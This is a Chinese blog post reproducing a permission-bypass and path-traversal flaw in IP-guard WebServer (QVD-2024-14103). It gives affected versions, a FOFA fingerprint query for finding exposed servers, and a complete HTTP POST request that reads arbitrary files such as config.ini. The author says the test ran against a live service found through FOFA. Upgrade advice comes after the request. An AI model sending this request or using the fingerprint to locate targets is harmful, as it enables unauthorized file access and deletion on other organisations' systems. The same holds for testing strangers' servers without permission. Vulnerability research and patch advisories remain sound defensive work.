IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)

IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)

1.漏洞描述

IP-guard 是由广州市溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

由于IP-guard WebServer的权限验证机制中存在设计缺陷,远程攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作

影响版本

IP-guard < 4.82.0609.0

fofa语法

复制代码
icon_hash="2030860561"

2.漏洞复现

用fofa查找了一个IP-guard 服务 进行漏洞复现

复制代码
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A


漏洞修复

官方已发布新版本修复漏洞,建议尽快访问官网(https://www.ip-guard.net/)或联系官方售后支持获取版本升级安装包或补丁,升级至4.82.0609.0版本及以上

相关推荐
技术不好的崎鸣同学2 小时前
[MRCTF2020]PYWebsite 思路及解法
安全·web安全
有浔则灵3 小时前
网络安全核心知识梳理:从OSI模型到密码技术
网络·安全·web安全
Rocket-Luo17 小时前
谈谈企业中的网络安全
网络·安全·web安全
技术不好的崎鸣同学18 小时前
[BJDCTF2020]The mystery of ip 思路及解法
网络·安全·web安全
Bruce_Liuxiaowei20 小时前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
HackTwoHub1 天前
企业级开源安全利器,整合漏洞管理、基线检查,威胁狩猎、情报联动,适配政企服务器安全运维
运维·服务器·人工智能·安全·web安全·开源·自动化
treesforest18 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
上海云盾第一敬业销售18 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手18 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub18 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全